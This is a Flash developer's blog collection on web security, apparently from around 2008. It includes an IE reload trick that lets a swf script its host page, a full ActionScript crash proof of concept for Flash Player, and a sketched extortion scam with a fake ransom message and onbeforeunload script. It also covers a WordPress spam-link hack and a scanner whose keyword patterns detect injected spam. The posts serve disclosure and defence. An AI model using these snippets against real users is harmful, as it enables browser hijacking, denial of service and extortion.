Bug in Internet Explorer security model when embedding Flash

Update: I’ve posted a real world example of this bug being exploited.

This one behaves the same on IE6, IE7 and the IE8 betas.

I have only tested this with Flash swf files, but it's likely that this restriction is applied, and broken, the same way when navigating directly to other types of files.

When a Flash file (swf) is loaded directly in the browser without an HTML container page, for example http://example.com/game.swf , most browsers generate an HTML page on the fly and embed the swf in it. Firefox and Google Chrome generate an embed tag with some default values, and IE uses the mshtml script res://mshtml.dll/objectembed_neutral.js to load the object.

Because this generated embed tag does not set the allowScriptAccess attribute, it takes the default, sameDomain. The generated page has the same origin as the swf, so the swf can script the page it lives in through ExternalInterface; in other words, navigating directly to any swf hosted on a domain lets that swf run JavaScript in that domain's origin. That is a major security flaw, and I will post a real world example of it shortly.

Internet Explorer, rightly, treats this generated page as less trusted and restricts access to the JavaScript document object, which prevents the embedded swf from scripting the page's DOM.

You can test it yourself: open any swf file on the web in Internet Explorer, then run javascript:alert(document); from the address bar. You'll get the error "Access is denied": touching the document is prohibited.


But all that is needed to defeat this restriction in IE is to reload the page. That's it: reload once by pressing F5, run javascript:alert(document); again, and the document is returned with no error.

Most of the other JavaScript objects are still available on the first load, among them the native window object. A swf can therefore reload the page on its own with window.location.reload(), after which the restriction is gone and it can freely manipulate the page.

The script below can be run from inside the swf with ExternalInterface.call("eval", script). If the try block fails, the host is probably IE and the page reloads immediately, without the user noticing; on the second load the try block succeeds.

// Runs in the generated host page via ExternalInterface.call("eval", script)
try{
   var $d = document;   // throws "Access is denied" on the first load in IE
   //Mess with the DOM
}catch(ex){
   window.location.reload();   // after the reload, the document is accessible
}

I was impressed that Microsoft implemented such a security feature, as opposed to Firefox, Chrome and others, which have no similar restriction. But it needs to be done right, otherwise it misses the point.

As I said, I’ll post a real world example of this being exploited, soon.

Police brutality against Flash

Update: You need to check the website to see what I’m talking about

The police (not the band) is in general a problematic institution. Give average (and below average) humans excessive power and it is likely that this power will be badly abused. I've always considered the Israeli police as somewhat average (and average is relatively very good for a police force).

Until I saw their pathetic attempt to create what they call the "Virtual Police Station", built to the worst standards of the 90s. This is clearly a bad abuse of the Flash technology.

One should ask oneself: until when will I stand aside and let these kinds of things happen? When will I stand up and protest?!

Fat cop, thin cop (It stretches)

The police is not secure?!

Although the result is very bad, I must concede that there might, only might, be some users with very little tech knowledge who find this version of the website easier to understand. For that doubt alone, and because I don't want to be hunted by the police and spend the rest of my life behind bars, I'll congratulate them for the attempt to create something different ;)

Mysterious Flash exploit is hijacking the clipboard?

Update: The Adobe Product Security Incident Response Team (PSIRT) has referred to this as the "Clipboard attack".

Update 2: Aviv Raff has updated me that it won't be that easy to replicate this attack using JavaScript on the latest browsers with the default security settings. Thanks.

Lately there have been rumors about a mysterious Flash exploit that hijacks the user's clipboard and always fills it with a URL to some malicious website: no matter what you copy, it will always paste the same URL. The malicious website asks you to download a fake anti-virus. It has also been mentioned in some places that the only way to clear this behavior is to restart your machine.

But is it really an exploit, a bug in the Flash player that lets the attacker take over the user's clipboard until a restart?! From what I've seen so far it's not an exploit and no restart is needed; it's just abuse of a legitimate Flash and JavaScript feature. Both allow a script to write text to the user's clipboard (Flash through System.setClipboard(), and IE through window.clipboardData.setData()). I'm surprised that only now is this questionable feature starting to get abused. The abusing code probably lives in a Flash ad in one of the user's tabs and keeps rewriting the clipboard on a timer, which is why it looks persistent; closing the tab that hosts it, rather than restarting, is what stops it.

Although this attack can be done using simple JavaScript, Flash is the right vessel for this kind of attack. I think that encapsulating attacks inside RIA code, mainly Flash and Silverlight, is just starting to gain attention and will become a major security issue. I have some other examples which I intend to write about soon.

My blog has been hacked

The first part of a hacker's job is to gather information about her target: the server, technology and software running on it. With WordPress all that is needed is viewing the HTML source: the generator "<meta>" tag tells the attacker which version of WordPress is running and therefore how vulnerable it is. Attackers scan/google for this automatically, along with other parameters, to pick the blogs they want to hack.

I always saw the update notices in the WordPress dashboard and always stupidly ignored them, thinking, who would want to hack my blog?! I should have known that a PageRank of 7 is very appealing to spammers. But even if you have no PR or very low traffic it doesn't mean you're safe from being hacked; very new and unpopular blogs have been reported hacked as well.

The attackers used an old exploit against my blog, a very old one, and polluted it with thousands of spam pages, all hidden in obscure folders. One of the first things I noticed was strange traffic coming in, mostly from unrelated blogs that showed no visible link to me; only when looking at their HTML source did I see the hidden links. I realized I was part of a zombie network of hacked blogs and splogs, all for the sake of generating spam money. I informed some of those websites that they had probably been hacked as well, and I still find new websites with hidden links to my blog that are probably controlled as part of the same spammer network. This indicates that the attackers' work is far from perfect and probably not fully automated, as they still don't know I'm out of it and still link to me.

Servers these days have become (relatively) very secure; securing one has become mostly plug and play: you plug in your firewall, you plug in your security software suite and you're almost done (I don't want to disregard IT staff and their hard work, but you get the point). Attack vectors have therefore shifted to exploiting the developer's code and the end user, as these are the most error-prone areas these days. So it has become the developer's responsibility not only to write code that compiles but to write secure code. As for users, not much can be expected of them and they must be allowed to be very dumb. It's not clear yet whether developers can be expected to always produce safe code: WordPress is created by highly talented developers and still all of its security flaws were due to insecure coding. I've heard this compared with an old development problem, producing optimized code, which was never completely solved. Currently developers don't have sufficient tools and resources to overcome these problems. One can only hope that, in the same way that viruses have lost their strength over the years, the same will happen to these kinds of attacks. We can only wonder what the next generation of attackers will be; maybe end users will become the only reasonable target.

The first lesson here is to always upgrade your blog. Although this can be a tiring process, with updates coming all the time, it must be done. The WordPress update process itself is very easy and fast and I really encourage you to do it the minute a new version is available. You might want to be assisted by this auto upgrade plug-in.

What is described here is mostly about the WordPress blog platform, but it is far from the only massively used, and massively attacked, open-source web application.

Finally I would like to try and coin a new phrase. The same way we were introduced to the developer who can also be a designer, named Devinger, I think it's time to introduce the Safeloper: a developer who has the tools and knowledge to produce secure programs. ;)

I guess we should always expect to be hacked and always backup.

How to find out if you’ve been hacked:

As opposed to old school Internet hacking, where the attacker's main goal was to make a name for herself and have the attack known and published, in this new kind of hacking the attacker's main goal is to make money through spam, and so the last thing she wants is for the owner of the hacked website to have any clue that it's been compromised. You might get a weird increase or decrease in traffic and the Google PR might drop a bit, but you won't see anything obviously different unless you look for it.

Simple as that: view the source of your pages and search for spam words like cars, mortgage, pharmaceutical, etc. The injected links are usually hidden from visitors (for example inside a block styled display:none or positioned off-screen), so they only show up in the source.

Look at the traffic to your blog. If you see strangely unrelated blogs linking to you, there is a good chance you've been hacked and are being used as a splog. Go to the suspect blog and view its source for hidden spam links to you.

Look at the Google search traffic to your blog. The latest exploit, also known as the anyresult.net hack, steals the Google results of your blog. Clear all cookies, search for yourself on Google, and if a link to your blog redirects to another website then you've been hacked. Clear your cookies again and repeat this a few times to be sure.

Make Sure Your WordPress is Not Hacked – some more info.
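As an added example (this is not code from the post, from WordPress or from any of the linked tools), here is a small Node.js scanner that automates the "view source and look" checks above. It runs over the saved HTML of a page (your own blog, or a suspect blog that links to you) and reports three things: links inside hidden containers, links whose anchor text contains spam keywords, and the WordPress generator meta tag that leaks the version. The keyword list, the CSS patterns treated as "hidden" and the sample HTML are constructed for illustration; tune the keywords to the spam you actually see.

```javascript
// Added example: heuristic scanner for injected spam links and the WordPress
// version leak. Regex-based on purpose so it runs with no dependencies; it is
// a triage aid, not a parser, and nested same-name tags can confuse it.
const SPAM_WORDS = ["pharmac", "viagra", "cialis", "casino", "mortgage", "car insurance"];

// Inline styles commonly used to hide injected links from visitors.
const HIDDEN_STYLE = /style\s*=\s*["'][^"']*(display\s*:\s*none|visibility\s*:\s*hidden|(left|top)\s*:\s*-\d{3,}px)[^"']*["']/i;
// Any <a href="..."> ... </a>; group 1 is the href, group 2 the inner HTML.
const ANCHOR = /<a\b[^>]*href\s*=\s*["']([^"']+)["'][^>]*>([\s\S]*?)<\/a>/gi;
// Opening tags of the elements spam injections usually wrap links in.
const CONTAINER_OPEN = /<(div|span|p|ul|li)\b[^>]*>/gi;

function scanHtml(html) {
  const findings = [];

  // 1. Version leak: <meta name="generator" content="WordPress x.y" />
  const gen = html.match(/<meta\b[^>]*name\s*=\s*["']generator["'][^>]*content\s*=\s*["']([^"']*)["']/i);
  if (gen) findings.push({ kind: "generator-meta", detail: gen[1] });

  // 2. Links inside hidden containers: for each hidden opening tag, take the
  //    markup up to the next closing tag of the same element name.
  let m;
  while ((m = CONTAINER_OPEN.exec(html)) !== null) {
    if (!HIDDEN_STYLE.test(m[0])) continue;
    const close = html.indexOf("</" + m[1], m.index);
    const block = html.slice(m.index, close === -1 ? html.length : close);
    for (const a of block.matchAll(ANCHOR)) {
      findings.push({ kind: "hidden-link", href: a[1], text: a[2].trim() });
    }
  }

  // 3. Any link whose anchor text carries a spam keyword, hidden or not.
  for (const a of html.matchAll(ANCHOR)) {
    const text = a[2].toLowerCase();
    if (SPAM_WORDS.some((w) => text.includes(w))) {
      findings.push({ kind: "spam-anchor", href: a[1], text: a[2].trim() });
    }
  }
  return findings;
}

// Constructed sample page: one honest link, two hidden blocks, version leak.
const SAMPLE_HTML = `
<html><head>
<meta name="generator" content="WordPress 2.5" />
</head><body>
<p>Welcome to my blog about Flash.</p>
<div style="position:absolute; left:-9999px">
  <a href="http://example.net/buy-pharmacy">cheap pharmacy</a>
  <a href="http://example.org/">my blog</a>
</div>
<div style="display:none"><a href="http://example.com/car-insurance">car insurance</a></div>
<a href="http://example.org/about">About</a>
</body></html>`;

// To scan a real page, replace SAMPLE_HTML with fs.readFileSync("page.html", "utf8").
for (const f of scanHtml(SAMPLE_HTML)) console.log(f);
```

A hidden link that also carries a spam keyword is reported twice, once as hidden-link and once as spam-anchor; that is deliberate, since a hidden link to an innocent-looking site (the "my blog" case above, which is what the splogs in this story looked like) is the more interesting finding and should not be filtered out by the keyword list.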

What to do if you’ve been hacked

I would suggest backing up everything from your blog, including all the file folders and the database, and then doing a fresh install of the latest WordPress (currently 2.5.1). To back up the folders use an FTP client; the DB backup is generally done from the hosting control panel or from the WP admin. Only after the fresh install, start adding back the customized stuff like themes and plug-ins, checking each one as you add it; you should even check the images. When it comes to plug-ins you're better off re-downloading them than restoring them from the backup.

Change your blog password and the passwords of all registered users, and make sure all the users are legitimate and not created by the hacker. It's better not to use WP's user registration, as it has been the source of many of the previous exploits.

How to prevent your blog from future hacks

Always install updates – It's fast and easy.

Remove the generator meta tag – WP prints its version number inside the HTML; if present, it helps the hacker know how vulnerable you are.

Put empty index.html files inside the WP plugins folder and any other folder that has no index file – It won't stop anyone, but it makes it harder for the attacker to learn the structure of your blog and which plug-ins you have installed.

Monitor your files for changes, or use some kind of script-level firewall.

Install only trusted plug-ins

More Resources:

Did your WordPress site get hacked? – More info about the structure of the WordPress attacks and how to prevent them, written by one of the WordPress people.

Patching the WordPress AnyResults.Net Hack – Describes how to fix the latest WordPress exploit, which affects WP 2.5 or earlier. It was fixed in WP 2.5.1, but updating does not automatically clean a blog that was already exploited. This exploit redirects search engine results for your website to anyresult.net. More, more and more.

File change notifications for your WordPress blog on Linux – A good explanation of how to monitor file changes on your blog, so you'll know when a hacker has managed to change or add files. The problem with it is that it recommends not monitoring the cache folder, because WordPress constantly writes to it. Hackers are also aware that this folder is difficult to monitor, and it's where they put their malicious files.

Firewallscript WordPress Firewall – A commercial ($85) firewall that runs at the PHP script level without needing to be installed on the server itself, and hence suitable for shared hosting. It monitors files for changes and more.

Munin A PHP application firewall – The same as above, but free and open-source.

WordPress exploit: we been hit by hidden spam link injection – More information on how to deal with hidden spam link injection

Won't publish posts anymore – A less common hack that prevents you from publishing to your own blog.

How to Protect Your WordPress Site

9 easy ways to secure your WordPress blog

10 Ways to Secure your WordPress Install

Almost Perfect htaccess File for WordPress Blogs

When Patches are the Problem – Apparently automatic security updates aren't a perfect solution either.

Security through visibility: The secrets of open source security – WordPress is open source; does that really make it less secure?

XP SP3 downgrades the Flash Player

Update: Apparently SP3 doesn’t downgrade the player. It’ll only install an older version 9.0.115 if you don’t have the latest 9.0.124 already installed, according to this blog post from Ryan Stewart. More info here.

The latest Windows XP service pack 3 was reported to come bundled with the old 8.0.24.0 version of the Flash player (see the update above for what it actually ships). That version, besides not being able to play back some of the latest web content, has some major security flaws, a weaker security model and other bugs.

If you apply this update to your windows system, make sure you install the latest Flash player from here.

Security flaws in FLA files

FLA is one of those file formats that we're used to opening freely, without any fear. That confidence is going to change, since a new exploit has been found that lets an attacker craft an FLA file so that, when it is loaded into the Flash CS3 or Flash 8 IDE, it executes arbitrary code on the machine.

No need to panic; it's unlikely that many malicious FLA files are floating around. Just don't open any untrusted FLA files until Adobe issues the fix.

More info

Technical info

Social Engineering Exploits using Flash

Apparently Adobe has fixed the bug I found that lets a swf file crash the browser, in the latest version of the Flash Player (9,0,115,0). I don't know if it's related to my post, but anyway it's good that it's been fixed.

Since it's already fixed, I just want to give an example of how it could have been exploited with a little social engineering. This example might look stupid to you and you would never fall for it, but remember: first, it's only an idea and a real attacker might be more creative; second, some Internet users are far from savvy and might fall for crazier stuff than this.

In this example, the naive user reaches a web site with this text: "I've installed a virus on your Windows machine and now have full control of it and your Firefox browser. You have exactly 1:00 minute to donate $10 to my account; click here to donate. If you fail to donate in time I will disable your browser for a few minutes. This is your first and last warning. Afterwards you have exactly 10 minutes to return to this page and complete your donation, or your system and personal data will be compromised and damaged permanently. The only way to remove the virus from your machine is to donate from this page."

Details like the OS and browser would be substituted with the real user's specs. The user sees the 1:00 minute timer counting down; when it reaches 0:00, boom! the browser crashes using the Flash bug. If the user tries to close the browser or the tab, JavaScript's onbeforeunload can be used to crash the browser too, and to add a scary alert.

window.onbeforeunload = function()
{
    //flash.kill();   // trigger the Flash crash bug before the page unloads
    return "If you leave this page without donating your system will be lost!!!";
}

Some users will have enough fear in them to return and donate to the attacker's PayPal account. Sounds crazy?! Some have been known to fall for crazier phishing tricks. I personally know a few. Take care of the dummies near you.

Too much focus will kill you

I've just come across a way to kill the Flash player with a few lines of AS 2.0. I know of at least one other way of killing the Flash player along with its host, be it the browser or the Flash IDE, but that was with the old player 7; this time we're talking about the latest version 9. It's a little awkward, and don't ask me how I got it, but it involves a MovieClip, a TextField, Selection, Macromedia's Delegate, a filter, and a trace; yeah, it won't work without a call to trace. I think the main troublemaker is Selection.onSetFocus, but I couldn't recreate it without any of the above ingredients, and I have a feeling that AS2's trace is also problematic in Flash Player 9. (You should anyway "Omit trace actions", in the publish settings, when publishing swfs.)

Focus Kills

I haven't tried it, but I doubt that it can be recreated with AS3 on VM2; it's VM1, which we have to carry along for backward compatibility, that causes all this trouble. I tested it on several machines with different Flash players and so far it crashed them all. Here is the list:

Ver: WIN 8,0,22,0 | Debug: true | OS: Windows XP
Ver: WIN 9,0,16,0 | Debug: true | OS: Windows XP
Ver: WIN 9,0,28,0 | Debug: false | OS: Windows XP
Ver: WIN 9,0,45,0 | Debug: false | OS: Windows XP
Ver: WIN 9,0,45,0 | Debug: false | OS: Windows (Server 2003)
Ver: WIN 9,0,45,0 | Debug: true | OS: Windows Vista
Ver: WIN 9,0,45,0 | Debug: false | OS: Windows Vista
Ver: WIN 9,0,47,0 | Debug: false | OS: Windows Vista
Ver: MAC 9,0,28,0 | Debug: false | OS: Mac OS 10.4.9

Copy this code into the first frame of an empty FLA, or download the source below, to see how it goes.

// Empty clip that receives a filter while the focus fight is going on
var mc:MovieClip = this.createEmptyMovieClip("mc", 0);

// Input field: clicking it (or tabbing to it) triggers onSetFocus
var tf:TextField = this.createTextField("tf", 1, 20, 20, 300, 100);
tf.type = "input";
tf.border = true;
tf.text = "Flash Player Version: " + System.capabilities.version
    + "\nDebug Player: " + System.capabilities.isDebugger
    + "\nOperating System: " + System.capabilities.os
    + "\n\nClick here or press the TAB key to kill Flash";

// Delegate keeps 'this' bound to the timeline when the field gains focus
tf.onSetFocus = mx.utils.Delegate.create(this, glow);

// Global Selection listener: push focus straight back to where it came from
Selection.addListener(this);

function onSetFocus(oldf:Object, newf:Object):Void {
    Selection.setFocus(oldf);
}

function glow() {
    mc.filters = [new flash.filters.BevelFilter()]; // any filter except BitmapFilter()
    trace(mc.filters); // the crash does not reproduce without this trace call
}

Download source files.

Try it (Warning!!! it may crash your browser)

Valve was hacked again

Valve, the maker of two of the best games of all time, Half-Life 1 and 2, was already hacked once, in 2003. The source code of its highly anticipated, in-development game Half-Life 2 was stolen and was then available to everyone on the web. Playable versions started to emerge, and the company had to postpone the release for months, which cost them a lot of money and pain. You might have thought they learned from the experience, but it seems they may have been hacked again. This time there is no source code for you to peek at; "only" sensitive data like users' credit card numbers was stolen.

Read more about it…

The alleged hacker's words…

At the moment there is no official confirmation of this, and personally I hope it isn't true; I'd like Valve to spend their time delivering the next best games instead of having to deal with this.